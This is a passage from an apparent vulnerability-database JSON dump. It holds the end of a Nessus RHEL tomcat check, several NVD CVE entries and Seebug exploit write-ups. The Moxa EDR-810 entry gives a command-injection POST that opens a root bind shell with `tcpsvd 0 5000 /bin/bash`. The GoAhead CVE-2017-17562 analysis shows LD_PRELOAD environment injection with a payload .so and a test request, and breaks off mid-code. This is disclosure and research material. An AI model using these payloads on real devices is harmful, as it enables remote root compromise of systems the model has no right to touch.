value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:0935\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat-7.0.69-11.el7_3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat-admin-webapps-7.0.69-11.el7_3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat-docs-webapp-7.0.69-11.el7_3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat-el-2.2-api-7.0.69-11.el7_3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat-javadoc-7.0.69-11.el7_3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat-jsp-2.2-api-7.0.69-11.el7_3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat-jsvc-7.0.69-11.el7_3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat-lib-7.0.69-11.el7_3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat-servlet-3.0-api-7.0.69-11.el7_3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat-webapps-7.0.69-11.el7_3\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat / tomcat-admin-webapps / tomcat-docs-webapp / etc\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2019-05-29T18:16:47", "bulletinFamily": "NVD", "description": "An exploitable command injection vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP POST can cause a privilege escalation, resulting in a root shell. An attacker can inject OS commands into the ip= parm in the \"/goform/net_WebPingGetValue\" URI to trigger this vulnerability.", "modified": "2018-06-15T18:54:00", "id": "CVE-2017-12120", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12120", "published": "2018-05-14T20:29:00", "title": "CVE-2017-12120", "type": "cve", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:14:46", "bulletinFamily": "NVD", "description": "In Android before 2018-04-05 or earlier security patch level on Qualcomm Snapdragon Mobile and Snapdragon Wear MSM8909W, SD 210/SD 212/SD 205, SD 400, SD 410/12, SD 425, SD 427, SD 430, SD 435, SD 450, SD 625, SD 650/52, SD 800, SD 808, SD 810, SD 820, SD 835, SD 845, SDM630, SDM636, SDM660, and Snapdragon_High_Med_2016, processing erroneous bitstreams may result in a HW freeze. FW should detect the HW freeze based on watchdog timer, but because the watchdog timer is not enabled, an infinite loop occurs, resulting in a device freeze.", "modified": "2018-05-02T12:58:00", "id": "CVE-2015-9222", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9222", "published": "2018-04-18T14:29:00", "title": "CVE-2015-9222", "type": "cve", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:14:40", "bulletinFamily": "NVD", "description": "The crash reporting feature in Abrt allows local users to gain privileges by leveraging an execve by root after a chroot into a user-specified directory in a namedspaced environment.", "modified": "2018-03-08T16:03:00", "id": "CVE-2015-1862", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1862", "published": "2018-02-09T22:29:00", "title": "CVE-2015-1862", "type": "cve", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2018-06-26T22:15:02", "bulletinFamily": "exploit", "description": "### Summary\r\nAn exploitable command injection vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP POST can cause a privilege escalation, resulting in a root shell. An attacker can inject OS commands into the ip= parm in the \"/goform/net_WebPingGetValue\" URI to trigger this vulnerability.\r\n\r\n### Tested Versions\r\nMoxa EDR-810 V4.1 build 17030317\r\n\r\n### Product URLs\r\nhttps://www.moxa.com/product/EDR-810.htm\r\n\r\n### CVSSv3 Score\r\n8.8 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\r\n\r\n### CWE\r\nCWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')\r\n\r\n### Details\r\nOnce logged in to the device's web interface, a diagnostic ping page can be found. This page asks the user for an IP address to ping. There is input validation client-side, but it can be easily bypassed by using tools, such as cURL or Wget. There is no server-side validation of input. The page will call the system to run the Linux ping command. The system will run the following command with '%s' as user-controlled input.\r\n```\r\necho \"$(ping -c 4 %s -q -W 3| grep 'received' | cut -d ' ' -f4)\" > /mnt/ramdisk/MagicPingResult\r\n```\r\n\r\nThe code below shows user input being passed to system.\r\n```\r\nR0, =aRmFMntRamdiskM ; \"rm -f /mnt/ramdisk/MagicPingResult\"\r\n.text:0003C7D8 BL system\r\n.text:0003C7DC LDR R2, =aEchoPingC4SQW3 ; \"echo \"$(ping -c 4 %s -q -W 3| grep 'received' | cut -d ' ' -f4)\" > /mnt/ramdisk/MagicPingResult\"\r\n.text:0003C7E0 SUB R1, R11, #-command\r\n.text:0003C7E4 SUB R3, R11, #-dest\r\n.text:0003C7E8 MOV R0, R1 ; s\r\n.text:0003C7EC MOV R1, R2 ; format\r\n.text:0003C7F0 MOV R2, R3\r\n.text:0003C7F4 BL sprintf\r\n.text:0003C7F8 SUB R3, R11, #-command\r\n.text:0003C7FC MOV R0, R3 ; command\r\n.text:0003C800 BL system # call to system\r\n```\r\nVulnerable URI: /goform/net_WebPingGetValue Vulnerable Parameter: `ip=`\r\n\r\n### Exploit Proof-of-Concept\r\nThe following POST will start a root shell on port 5000.\r\n```\r\nPOST: /goform/net_WebPingGetValue HTTP/1.1\r\nHost: DeviceIP\r\nCooke: Valid-Cookie\r\nContent-Type: japplication/x-www-form-urlencoded\r\n\r\npingTemp=127.0.0.1&ifs=1&ip=`tcpsvd 0 5000 /bin/bash`#\r\n```\r\n\r\n### Timeline\r\n* 2017-11-15 - Vendor Disclosure\r\n* 2017-11-19 - Vendor Acknowledged\r\n* 2017-12-25 - Vendor provided timeline for fix (Feb 2018)\r\n* 2018-01-04 - Timeline pushed to mid-March per vendor\r\n* 2018-03-24 - Talos follow up with vendor for release timeline\r\n* 2018-03-26 - Timeline pushed to 4/13/18 per vendor\r\n* 2018-04-12 - Vendor patched & published new firmware on website\r\n* 2018-04-13 - Public Release", "modified": "2018-04-16T00:00:00", "published": "2018-04-16T00:00:00", "id": "SSV:97231", "href": "https://www.seebug.org/vuldb/ssvid-97231", "type": "seebug", "title": "Moxa EDR-810 Web Server ping Command Injection Vulnerability(CVE-2017-12120)", "sourceData": "", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-12-25T18:38:37", "bulletinFamily": "exploit", "description": "### INTRODUCTION\r\nThis blog post details [CVE-2017-17562](https://nvd.nist.gov/vuln/detail/CVE-2017-17562), a vulnerability which can be exploited to gain reliable remote code execution in all versions of the GoAhead web server < 3.6.5.\r\n\r\nThe vulnerability is a result of Initialising the environment of forked CGI scripts using untrusted HTTP request parameters, and will affect all user\u2019s who have CGI support enabled with dynamically linked executables (CGI scripts). This behavior, when combined with the glibc dynamic linker, can be abused for remote code execution using special variables such as `LD_PRELOAD` (commonly used to perform function hooking, see [preeny](https://github.com/zardus/preeny)).\r\n\r\nFor those unfamiliar with GoAhead, its [marketing page](https://embedthis.com/goahead/) says that it\u2019s \u201cthe world\u2019s most popular, tiny embedded web server\u201d and is used by such companies as IBM, HP, Oracle, Boeing, D-link, and Motorola. We did a search on shodan, and found over 735,000 devices using it on the internet today.\r\n\r\nShodan search results\r\n\r\n![](https://images.seebug.org/1513654932926)\r\n\r\nZoomEye search results\r\n\r\n![](https://images.seebug.org/1513657791312-w331s)\r\n\r\nThe exploitation of this issue serves as an interesting case study, and could be applied to other types of software with the same insecure construct.\r\n\r\n### VULNERABILITY ANALYSIS\r\nThis vulnerability has existed in all versions of GoAhead since at least 2.5.0 (we could not find earlier versions to test against). You can follow along by cloning and compiling the repository as follows:\r\n\r\nFigure-2: Cloning and running the vulnerable GoAhead daemon\r\n```\r\ndaniel@makemyday:~$ git clone https://github.com/embedthis/goahead.git\r\nCloning into 'goahead'...\r\nremote: Counting objects: 20583, done.\r\nremote: Total 20583 (delta 0), reused 0 (delta 0), pack-reused 20583\r\nReceiving objects: 100% (20583/20583), 19.71 MiB | 4.76 MiB/s, done.\r\nResolving deltas: 100% (14843/14843), done.\r\ndaniel@makemyday:~$ cd goahead/\r\ndaniel@makemyday:~/goahead$ ls\r\nconfigure CONTRIBUTING.md doc installs main.me Makefile paks README.md test\r\nconfigure.bat dist farm.json LICENSE.md make.bat package.json projects src\r\ndaniel@makemyday:~/goahead$ git checkout tags/v3.6.4 -q\r\ndaniel@makemyday:~/goahead$ make > /dev/null\r\ndaniel@makemyday:~/goahead$ cd test\r\ndaniel@makemyday:~/goahead/test$ gcc ./cgitest.c -o cgi-bin/cgitest\r\ndaniel@makemyday:~/goahead/test$ sudo ../build/linux-x64-default/bin/goahead\r\n```\r\n\r\n### CODE\r\n\r\nThe vulnerability resides in the `cgiHandler` function, which starts by allocating an array of pointers for the `envp` [argument](https://www.gnu.org/software/libc/manual/html_node/Program-Arguments.html) of the new process, followed by initialising it with the key-value pairs taken from HTTP request parameters. Finally, the `launchCgi` function is called which `fork\u2019s` and `execve\u2019s` the CGI script.\r\n\r\nBesides filtering `REMOTE_HOST` and `HTTP_AUTHORIZATION`, all other parameters are considered trusted and passed along unfiltered. This allows an attacker control over arbitrary environment variables for the new CGI process. This is quite dangerous, as you will see later in the exploitation section.\r\n\r\nFigure-3: [goahead/src/cgi.c:cgihandler](https://github.com/embedthis/goahead/blob/f9ea55ace3143259095e70c2e05140b1daadadbe/src/cgi.c#L51)\r\n```\r\n...\r\nPUBLIC bool cgiHandler(Webs *wp)\r\n{\r\n Cgi *cgip;\r\n WebsKey *s;\r\n char cgiPrefix[ME_GOAHEAD_LIMIT_FILENAME], *stdIn, *stdOut, cwd[ME_GOAHEAD_LIMIT_FILENAME];\r\n char *cp, *cgiName, *cgiPath, **argp, **envp, **ep, *tok, *query, *dir, *extraPath, *exe;\r\n CgiPid pHandle;\r\n int n, envpsize, argpsize, cid;\r\n\r\n...\r\n\r\n /*\r\n Add all CGI variables to the environment strings to be passed to the spawned CGI process. This includes a few\r\n we don't already have in the symbol table, plus all those that are in the vars symbol table. envp will point\r\n to a walloc'd array of pointers. Each pointer will point to a walloc'd string containing the keyword value pair\r\n in the form keyword=value. Since we don't know ahead of time how many environment strings there will be the for\r\n loop includes logic to grow the array size via wrealloc.\r\n */\r\n envpsize = 64;\r\n envp = walloc(envpsize * sizeof(char*));\r\n for (n = 0, s = hashFirst(wp->vars); s != NULL; s = hashNext(wp->vars, s)) {\r\n if (s->content.valid && s->content.type == string &&\r\n strcmp(s->name.value.string, \"REMOTE_HOST\") != 0 &&\r\n strcmp(s->name.value.string, \"HTTP_AUTHORIZATION\") != 0) {\r\n envp[n++] = sfmt(\"%s=%s\", s->name.value.string, s->content.value.string);\r\n trace(5, \"Env[%d] %s\", n, envp[n-1]);\r\n if (n >= envpsize) {\r\n envpsize *= 2;\r\n envp = wrealloc(envp, envpsize * sizeof(char *));\r\n }\r\n }\r\n }\r\n *(envp+n) = NULL;\r\n\r\n /*\r\n Create temporary file name(s) for the child's stdin and stdout. For POST data the stdin temp file (and name)\r\n should already exist.\r\n */\r\n if (wp->cgiStdin == NULL) {\r\n wp->cgiStdin = websGetCgiCommName();\r\n }\r\n stdIn = wp->cgiStdin;\r\n stdOut = websGetCgiCommName();\r\n if (wp->cgifd >= 0) {\r\n close(wp->cgifd);\r\n wp->cgifd = -1;\r\n }\r\n\r\n /*\r\n Now launch the process. If not successful, do the cleanup of resources. If successful, the cleanup will be\r\n done after the process completes.\r\n */\r\n if ((pHandle = launchCgi(cgiPath, argp, envp, stdIn, stdOut)) == (CgiPid) -1) {\r\n...\r\n```\r\n\r\n### PATCH\r\n\r\nThis issue was fixed by skipping special parameter names, and prefixing all others with a static string. This appears to remediate the issue even against parameters of the form `a=b%00LD_PRELOAD%3D` - but please let me know if you find otherwise, I\u2019d love to hear about it!\r\n\r\nFigure-4: [git diff f9ea55a 6f786c1 src/cgi.c](https://github.com/embedthis/goahead/commit/6f786c123196eb622625a920d54048629a7caa74#diff-7c9c60c790648b06210f57b9e2f53ca7)\r\n```\r\ndiff --git a/src/cgi.c b/src/cgi.c\r\nindex 899ec97b..18d9b45b 100644\r\n--- a/src/cgi.c\r\n+++ b/src/cgi.c\r\n@@ -160,10 +160,17 @@ PUBLIC bool cgiHandler(Webs *wp)\r\n envpsize = 64;\r\n envp = walloc(envpsize * sizeof(char*));\r\n for (n = 0, s = hashFirst(wp->vars); s != NULL; s = hashNext(wp->vars, s)) {\r\n- if (s->content.valid && s->content.type == string &&\r\n- strcmp(s->name.value.string, \"REMOTE_HOST\") != 0 &&\r\n- strcmp(s->name.value.string, \"HTTP_AUTHORIZATION\") != 0) {\r\n- envp[n++] = sfmt(\"%s=%s\", s->name.value.string, s->content.value.string);\r\n+ if (s->content.valid && s->content.type == string) {\r\n+ if (smatch(s->name.value.string, \"REMOTE_HOST\") ||\r\n+ smatch(s->name.value.string, \"HTTP_AUTHORIZATION\") ||\r\n+ smatch(s->name.value.string, \"IFS\") ||\r\n+ smatch(s->name.value.string, \"CDPATH\") ||\r\n+ smatch(s->name.value.string, \"PATH\") ||\r\n+ sstarts(s->name.value.string, \"LD_\")) {\r\n+ continue;\r\n+ }\r\n+ envp[n++] = sfmt(\"%s%s=%s\", ME_GOAHEAD_CGI_PREFIX,\r\n+ s->name.value.string, s->content.value.string);\r\n trace(5, \"Env[%d] %s\", n, envp[n-1]);\r\n if (n >= envpsize) {\r\n envpsize *= 2;\r\n```\r\n\r\n### EXPLOITATION\r\n\r\nAlthough the ability to inject arbitrary environment variables into a new process may seem relatively benign, there are cases where \u201cspecial\u201d environment variables can lead to alternative control flows for the dynamic linker.\r\n\r\n### ELF DYNAMIC LINKER\r\n\r\nReading the ELF header of the `goahead` binary, we can see that it\u2019s a 64-bit dynamically-linked executable. The program interpreter is specified in the `INTERP` section and points to `/lib64/ld-linux-x86-64.so.2` (this is the dynamic linker).\r\n\r\nFigure-5: Reading the ELF header\r\n```\r\ndaniel@makemyday:~/goahead/build/linux-x64-default/bin$ readelf -hl ./goahead\r\nELF Header:\r\n Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00\r\n Class: ELF64\r\n Data: 2's complement, little endian\r\n Version: 1 (current)\r\n OS/ABI: UNIX - System V\r\n ABI Version: 0\r\n Type: DYN (Shared object file)\r\n Machine: Advanced Micro Devices X86-64\r\n Version: 0x1\r\n Entry point address: 0xf80\r\n Start of program headers: 64 (bytes into file)\r\n Start of section headers: 21904 (bytes into file)\r\n Flags: 0x0\r\n Size of this header: 64 (bytes)\r\n Size of program headers: 56 (bytes)\r\n Number of program headers: 9\r\n Size of section headers: 64 (bytes)\r\n Number of section headers: 34\r\n Section header string table index: 33\r\n\r\nProgram Headers:\r\n Type Offset VirtAddr PhysAddr\r\n FileSiz MemSiz Flags Align\r\n PHDR 0x0000000000000040 0x0000000000000040 0x0000000000000040\r\n 0x00000000000001f8 0x00000000000001f8 R E 0x8\r\n INTERP 0x0000000000000238 0x0000000000000238 0x0000000000000238\r\n 0x000000000000001c 0x000000000000001c R 0x1\r\n [Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]\r\n...\r\ndaniel@makemyday:~/goahead/build/linux-x64-default/bin$\r\n```\r\n\r\nThe dynamic linker is the first code which runs in a dynamically linked executable, and is responsible for linking and loading shared objects and resolving symbols. To get a list of all the shared objects the `goahead` binary loads, we can set a special environment variable `LD_TRACE_LOADED_OBJECTS` to `1`, which prints the loaded libraries and then exits.\r\n\r\nFigure-6: ld.so LD_TRACE_LOADED_OBJECTS\r\n```\r\ndaniel@makemyday:~/goahead/build/linux-x64-default/bin$ LD_TRACE_LOADED_OBJECTS=1 ./goahead\r\n linux-vdso.so.1 => (0x00007fff31bb4000)\r\n libgo.so => /home/daniel/goahead/build/linux-x64-default/bin/libgo.so (0x00007f571f548000)\r\n libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f571f168000)\r\n libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007f571ef49000)\r\n /lib64/ld-linux-x86-64.so.2 (0x00007f571f806000)\r\ndaniel@makemyday:~/goahead/build/linux-x64-default/bin$\r\n```\r\n\r\nWe can also find this information statically (without running the dynamic linker), by grepping for DT_NEEDED entries defined in each of the ELF shared objects recursively:\r\n\r\nFigure-7: statically finding shared object dependancies\r\n```\r\ndaniel@makemyday:~/goahead/build/linux-x64-default/bin$ readelf -d ./goahead | grep NEEDED\r\n 0x0000000000000001 (NEEDED) Shared library: [libgo.so]\r\n 0x0000000000000001 (NEEDED) Shared library: [libc.so.6]\r\ndaniel@makemyday:~/goahead/build/linux-x64-default/bin$ readelf -d /home/daniel/goahead/build/linux-x64-default/bin/libgo.so | grep NEEDED\r\n 0x0000000000000001 (NEEDED) Shared library: [libpthread.so.0]\r\n 0x0000000000000001 (NEEDED) Shared library: [libc.so.6]\r\ndaniel@makemyday:~/goahead/build/linux-x64-default/bin$ readelf -d /lib/x86_64-linux-gnu/libc.so.6 | grep NEEDED\r\n 0x0000000000000001 (NEEDED) Shared library: [ld-linux-x86-64.so.2]\r\ndaniel@makemyday:~/goahead/build/linux-x64-default/bin$\r\n```\r\n\r\nNote: For the astute reader who noticed these binaries are missing `linux-vdso.so.1`, that\u2019s correct! vDSO is a special shared library mapped into user-space processes by the kernel. See [man 7 vdso](http://man7.org/linux/man-pages/man7/vdso.7.html).\r\n\r\n### SPECIAL ENVIRONMENT VARIABLES\r\n\r\nSo that\u2019s good and all, but what does any of this have to do with injecting environment variables? Well \u2026 we know the dynamic linker is the first code to execute for a new process - and if we read [man 8 ld.so](http://man7.org/linux/man-pages/man8/ld.so.8.html) we discover there are special environment variables which modify default behavior.\r\n\r\nAs I\u2019m a fan of looking at the source, let us take a journey into what\u2019s happening. The dl_main function is essentially the main entry point of the dynamic linker.\r\n\r\nFigure-8: [glibc/elf/rtld.c:dl_main](https://sourceware.org/git/?p=glibc.git;a=blob;f=elf/rtld.c;h=cfd3729b8e7120d7f48c851deae7b6563a8df95e;hb=HEAD#l865)\r\n```\r\nstatic void\r\ndl_main (const ElfW(Phdr) *phdr,\r\n ElfW(Word) phnum,\r\n ElfW(Addr) *user_entry,\r\n ElfW(auxv_t) *auxv)\r\n{\r\n const ElfW(Phdr) *ph;\r\n enum mode mode;\r\n struct link_map *main_map;\r\n size_t file_size;\r\n char *file;\r\n bool has_interp = false;\r\n unsigned int i;\r\n\r\n...\r\n\r\n /* Process the environment variable which control the behaviour. */\r\n process_envvars (&mode);\r\n```\r\n\r\nOne of the first things this function does is call `process_envvars`.\r\n\r\nFigure-9: [glibc/elf/rtld.c:process_envvars](https://sourceware.org/git/?p=glibc.git;a=blob;f=elf/rtld.c;h=cfd3729b8e7120d7f48c851deae7b6563a8df95e;hb=HEAD#l2457)\r\n```\r\nstatic void\r\nprocess_envvars (enum mode *modep)\r\n{\r\n char **runp = _environ;\r\n char *envline;\r\n enum mode mode = normal;\r\n char *debug_output = NULL;\r\n\r\n /* This is the default place for profiling data file. */\r\n GLRO(dl_profile_output)\r\n = &\"/var/tmp\\0/var/profile\"[__libc_enable_secure ? 9 : 0];\r\n\r\n while ((envline = _dl_next_ld_env_entry (&runp)) != NULL)\r\n {\r\n size_t len = 0;\r\n\r\n while (envline[len] != '\\0' && envline[len] != '=')\r\n ++len;\r\n\r\n if (envline[len] != '=')\r\n /* This is a \"LD_\" variable at the end of the string without\r\n a '=' character. Ignore it since otherwise we will access\r\n invalid memory below. */\r\n continue;\r\n\r\n switch (len)\r\n {\r\n case 4:\r\n /* Warning level, verbose or not. */\r\n if (memcmp (envline, \"WARN\", 4) == 0)\r\n GLRO(dl_verbose) = envline[5] != '\\0';\r\n break;\r\n\r\n case 5:\r\n /* Debugging of the dynamic linker? */\r\n if (memcmp (envline, \"DEBUG\", 5) == 0)\r\n {\r\n process_dl_debug (&envline[6]);\r\n break;\r\n }\r\n if (memcmp (envline, \"AUDIT\", 5) == 0)\r\n audit_list_string = &envline[6];\r\n break;\r\n\r\n case 7:\r\n /* Print information about versions. */\r\n if (memcmp (envline, \"VERBOSE\", 7) == 0)\r\n {\r\n version_info = envline[8] != '\\0';\r\n break;\r\n }\r\n\r\n /* List of objects to be preloaded. */\r\n if (memcmp (envline, \"PRELOAD\", 7) == 0)\r\n {\r\n preloadlist = &envline[8];\r\n break;\r\n }\r\n```\r\n\r\nWe see that the linker is parsing the `envp` array and exercising different code paths if special variable names are found. What is particularly interesting is `case 7`\u2019s processing of `LD_PRELOAD`, where `preloadlist` is initialised.\r\n\r\nFigure-10: [glibc/elf/rtld.c:dl_main](https://sourceware.org/git/?p=glibc.git;a=blob;f=elf/rtld.c;h=cfd3729b8e7120d7f48c851deae7b6563a8df95e;hb=HEAD#l1606)\r\n```\r\n...\r\n /* We have two ways to specify objects to preload: via environment\r\n variable and via the file /etc/ld.so.preload. The latter can also\r\n be used when security is enabled. */\r\n assert (*first_preload == NULL);\r\n struct link_map **preloads = NULL;\r\n unsigned int npreloads = 0;\r\n\r\n if (__glibc_unlikely (preloadlist != NULL))\r\n {\r\n HP_TIMING_NOW (start);\r\n npreloads += handle_ld_preload (preloadlist, main_map);\r\n HP_TIMING_NOW (stop);\r\n HP_TIMING_DIFF (diff, start, stop);\r\n HP_TIMING_ACCUM_NT (load_time, diff);\r\n }\r\n...\r\n```\r\n\r\nFurther down in `dl_main`, if `preloadlist` is not `NULL` then the `handle_ld_preload` function is called.\r\n\r\nFigure-11: [glibc/elf/rtld.c:handle_ld_preload](https://sourceware.org/git/?p=glibc.git;a=blob;f=elf/rtld.c;h=cfd3729b8e7120d7f48c851deae7b6563a8df95e;hb=HEAD#l829)\r\n```\r\n/* The list preloaded objects. */\r\nstatic const char *preloadlist attribute_relro;\r\n/* Nonzero if information about versions has to be printed. */\r\nstatic int version_info attribute_relro;\r\n\r\n/* The LD_PRELOAD environment variable gives list of libraries\r\n separated by white space or colons that are loaded before the\r\n executable's dependencies and prepended to the global scope list.\r\n (If the binary is running setuid all elements containing a '/' are\r\n ignored since it is insecure.) Return the number of preloads\r\n performed. */\r\nunsigned int\r\nhandle_ld_preload (const char *preloadlist, struct link_map *main_map)\r\n{\r\n unsigned int npreloads = 0;\r\n const char *p = preloadlist;\r\n char fname[SECURE_PATH_LIMIT];\r\n\r\n while (*p != '\\0')\r\n {\r\n /* Split preload list at space/colon. */\r\n size_t len = strcspn (p, \" :\");\r\n if (len > 0 && len < sizeof (fname))\r\n {\r\n memcpy (fname, p, len);\r\n fname[len] = '\\0';\r\n }\r\n else\r\n fname[0] = '\\0';\r\n\r\n /* Skip over the substring and the following delimiter. */\r\n p += len;\r\n if (*p != '\\0')\r\n ++p;\r\n\r\n if (dso_name_valid_for_suid (fname))\r\n npreloads += do_preload (fname, main_map, \"LD_PRELOAD\");\r\n }\r\n return npreloads;\r\n}\r\n...\r\n```\r\n\r\nThe `handle_ld_preload` function will parse the `preloadlist` and treat its value as a list of shared objects to be loaded!\r\n\r\nIf we put all this together; with `goahead` enabling us to inject arbitrary environment variables, we can abuse the fact that glibc handles special cases such as `LD_PRELOAD` differently to load arbitrary shared objects that aren\u2019t even listed in the binary!\r\n\r\n### ELF .SO\r\n\r\nSo, that\u2019s cool and all - we can force arbitrary shared objects to be loaded. But how does this allow us to run code?\r\n\r\nEnter the [`.init` and `.fini` sections](http://l4u-00.jinr.ru/usoft/WWW/www_debian.org/Documentation/elf/node3.html). If we wrap a function with a [constructor attribute](https://gcc.gnu.org/onlinedocs/gcc/Common-Function-Attributes.html) then we can force that function to be called even before `main`.\r\n\r\nFigure-12: PoC/payload.c\r\n```\r\n#include <unistd.h>\r\n\r\nstatic void before_main(void) __attribute__((constructor));\r\n\r\nstatic void before_main(void)\r\n{\r\n write(1, \"Hello: World!\\n\", 14);\r\n}\r\n```\r\n\r\nFigure-13: Compiling payload.c as shared object.\r\n```\r\ndaniel@makemyday:~/goahead/PoC$ gcc -shared -fPIC ./payload.c -o payload.so\r\ndaniel@makemyday:~/goahead/PoC$ LD_PRELOAD=./payload.so cat /dev/null\r\nHello: World!\r\ndaniel@makemyday:~/goahead/PoC$\r\n```\r\n\r\nSweet! What does this look like if we try this out against GoAhead on our test system?\r\n\r\nFigure-14: Trying a simple PoC\r\n```\r\ndaniel@makemyday:~/goahead/PoC$ ls -la ./payload.so\r\n-rwxrwxr-x 1 daniel daniel 7896 Dec 13 17:38 ./payload.so\r\ndaniel@makemyday:~/goahead/PoC$ echo -en \"GET /cgi-bin/cgitest?LD_PRELOAD=$(pwd)/payload.so HTTP/1.0\\r\\n\\r\\n\" | nc localhost 80 | head -10\r\nHTTP/1.0 200 OK\r\nDate: Wed Dec 13 02:38:56 2017\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nX-Frame-Options: SAMEORIGIN\r\nPragma: no-cache\r\nCache-Control: no-cache\r\nhello: World!\r\ncontent-type: text/html\r\n\r\ndaniel@makemyday:~/goahead/PoC$\r\n```\r\n\r\nWe can clearly see that our shared objects code was executed by the `cgitest` process via `LD_PRELOAD`.\r\n\r\n### LINUX /PROC/SELF/FD/0\r\n\r\nThere is still one critical piece of the puzzle that we are missing. Even though we know it\u2019s possible to load arbitrary shared objects from disk, and constructors will allow for code execution - how do we actually inject a malicious shared object into the remote server? After all, if we can\u2019t do that then it\u2019s really unlikely a legitimate shared object on disk will help us.\r\n\r\nFortunately, the `launchCgi` method will actually [dup2()](http://man7.org/linux/man-pages/man2/dup.2.html) the stdin file descriptor which points to a temporary file containing the request body of the `POST` request. This means that there will be a file on disk containing user-supplied data and could be referenced with something like `LD_PRELOAD=/tmp/cgi-XXXXXX`.\r\n\r\nFigure-15: [goahead/src/cgi.c:launchCgi](https://github.com/embedthis/goahead/blob/f9ea55ace3143259095e70c2e05140b1daadadbe/src/cgi.c#L533)\r\n```\r\n/*\r\n Launch the CGI process and return a handle to it.\r\n */\r\nstatic CgiPid launchCgi(char 